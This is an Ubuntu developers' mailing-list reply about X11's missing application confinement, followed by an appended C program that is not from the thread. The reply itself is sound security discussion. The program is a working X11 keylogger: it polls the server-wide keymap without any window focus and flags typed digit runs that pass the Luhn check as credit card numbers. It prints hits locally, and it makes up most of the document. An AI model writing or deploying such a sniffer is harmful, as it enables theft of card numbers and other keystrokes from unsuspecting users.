
ubuntu-appstore-developers team mailing list archive

Re: Click apps on Desktop [...] - Flavors


On 07/26/2013 03:07 AM, Rick Spencer wrote:
> AIUI it's not a matter of making click work with xorg, it's a matter
> of making AppArmor work with xorg so that we don't have to inspect
> each application by hand to ensure that it is not malicious. In other
> words, this is about application sandboxing, not about click.
> 
Yes, exactly. I probably wasn't as clear as I needed to be on this point. Click
itself is fine; it is application confinement that doesn't cover xorg at this time.

> Please, someone, correct me if I am wrong, but I think the situation
> is that it is trivial to write an application that looks at all X
> input events, even for application windows from other apps. As such, I
> can write an app that looks for something that looks like a credit
> card number being entered into a web browser (as one obvious example)
> and upload that data to my evil server.

Yes.

> We don't think this is a
> problem in the Ubuntu repositories today because we inspect each
> application to make sure they don't do such a thing.
> 
> However, we want to make it easier for application developers to get
> their apps to users by, among other things, making it difficult for
> malicious applications to do naughty things, and therefore minimizing
> the effort and time necessary for manually checking them. We can
> achieve this reduction in manual vetting only via tight sandboxing
> for applications. With Mir, it is relatively easy, AIUI, to use
> AppArmor to restrict an application from knowing about other application
> windows, and therefore denying them access to the input for those
> windows. With xorg, it is not easy to use AppArmor in such a manner.
> 
Yes - because there is no code review, a malicious app can try to do anything
without anyone knowing about it. If a malicious app is running on X, it can then
sniff keyboard events like in your credit card example. The Mir design doesn't
need (much) AppArmor integration. The X design requires considerable work to
plug things like sniffing keyboard events (though it can be done).

> So, the question is about whether we can/should plug the security hole
> in xorg, it's not really about click.
> 
That is the core question, yes. I was expressing the opinion that because we
won't have X AppArmor mediation for 13.10, and because Unity 7 (which uses X)
won't be able to integrate with the app store and click yet anyway (per Martin
earlier in the thread), we should hold off on exposing app store click packages
to desktop users for now.

-- 
Jamie Strandboge                 http://www.ubuntu.com/

Attachment: signature.asc
Description: OpenPGP digital signature
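The following is an added example, not code from the thread or from Ubuntu, illustrating the X weakness Rick and Jamie discuss above: an ordinary, unconfined X client can read the server-wide keyboard state with XQueryKeymap() no matter which window has focus, so it can watch for digit runs that pass the Luhn check (the "looks like a credit card number" case). XQueryKeymap polling is one of several ways to do this (XRecord is another); the HAVE_X11 build switch, the cc_feed/find_card_number helpers and the keystroke log fed to the detector are all this example's own constructions. The code only reports matches locally.

```c
/* Added example: X11 keyboard-state sniffing plus a Luhn detector.
 * Build with X support:    cc -DHAVE_X11 xsniff.c -lX11
 * Build without X (runs the detector over a constructed keystroke log):
 *                          cc xsniff.c
 */
#include <stdio.h>
#include <string.h>

#define MAX_DIGITS 19   /* longest card number (PAN) length */
#define MIN_DIGITS 13

/* Luhn checksum: returns 1 if the digit string passes. */
static int luhn_ok(const char *digits, size_t n)
{
    int sum = 0, dbl = 0;
    for (size_t i = n; i > 0; i--) {
        int d = digits[i - 1] - '0';
        if (dbl) { d *= 2; if (d > 9) d -= 9; }
        sum += d;
        dbl = !dbl;
    }
    return sum % 10 == 0;
}

/* Accumulates a run of typed digits (spaces and dashes inside the run are
 * ignored, as people type "4111 1111 ..."). Any other character ends the
 * run; a 13-19 digit run that passes Luhn is copied to out. Returns 1
 * when a candidate was emitted. */
struct cc_detector { char buf[MAX_DIGITS + 1]; size_t len; int overflow; };

static int cc_feed(struct cc_detector *d, int ch, char *out, size_t outsz)
{
    int hit = 0;
    if (ch >= '0' && ch <= '9') {
        if (d->len < MAX_DIGITS) d->buf[d->len++] = (char)ch;
        else d->overflow = 1;          /* longer than any PAN: not a card */
        return 0;
    }
    if (ch == ' ' || ch == '-')
        return 0;
    d->buf[d->len] = '\0';
    if (!d->overflow && d->len >= MIN_DIGITS && d->len < outsz
        && luhn_ok(d->buf, d->len)) {
        memcpy(out, d->buf, d->len + 1);
        hit = 1;
    }
    d->len = 0;
    d->overflow = 0;
    return hit;
}

/* Scan a whole keystroke string; returns 1 and fills out on the first hit. */
static int find_card_number(const char *keys, char *out, size_t outsz)
{
    struct cc_detector det = {{0}, 0, 0};
    for (const char *p = keys; *p; p++)
        if (cc_feed(&det, (unsigned char)*p, out, outsz))
            return 1;
    return cc_feed(&det, '\n', out, outsz);   /* flush a run at end of input */
}

#ifdef HAVE_X11
#include <unistd.h>
#include <X11/Xlib.h>
#include <X11/XKBlib.h>
#include <X11/keysym.h>

/* Poll the server-wide keymap ~100 times a second and feed newly pressed
 * keys to the detector. No window, no focus and no grab is needed: this is
 * exactly the gap that AppArmor mediation of X would have to close. */
static int sniff_x_keyboard(void)
{
    Display *dpy = XOpenDisplay(NULL);
    char prev[32] = {0}, cur[32], pan[MAX_DIGITS + 1];
    struct cc_detector det = {{0}, 0, 0};
    if (!dpy) { fprintf(stderr, "no X display\n"); return 1; }
    for (;;) {
        XQueryKeymap(dpy, cur);
        for (int kc = 8; kc < 256; kc++) {
            int was = prev[kc / 8] & (1 << (kc % 8));
            int now = cur[kc / 8] & (1 << (kc % 8));
            if (!now || was) continue;
            KeySym ks = XkbKeycodeToKeysym(dpy, (KeyCode)kc, 0, 0);
            if (ks >= XK_Shift_L && ks <= XK_Hyper_R) continue;  /* modifiers */
            int ch = (ks >= XK_0 && ks <= XK_9) ? '0' + (int)(ks - XK_0)
                   : (ks == XK_space) ? ' ' : (ks == XK_minus) ? '-' : '\n';
            if (cc_feed(&det, ch, pan, sizeof pan))
                printf("card-like number seen: %s\n", pan);
        }
        memcpy(prev, cur, sizeof prev);
        usleep(10000);
    }
}
#endif

int main(void)
{
#ifdef HAVE_X11
    return sniff_x_keyboard();
#else
    /* Constructed keystroke log standing in for a captured session. */
    const char *log = "alice@example.com\tpa55w0rd\t4111 1111 1111 1111\t12/26\t123\n";
    char pan[MAX_DIGITS + 1];
    if (find_card_number(log, pan, sizeof pan))
        printf("card-like number seen: %s\n", pan);
    return 0;
#endif
}
```

Keypad digits (XK_KP_0..9) and non-US layouts are not handled; the point is only that the raw keyboard state is visible to every client, which is why the thread treats confinement, not click, as the blocker.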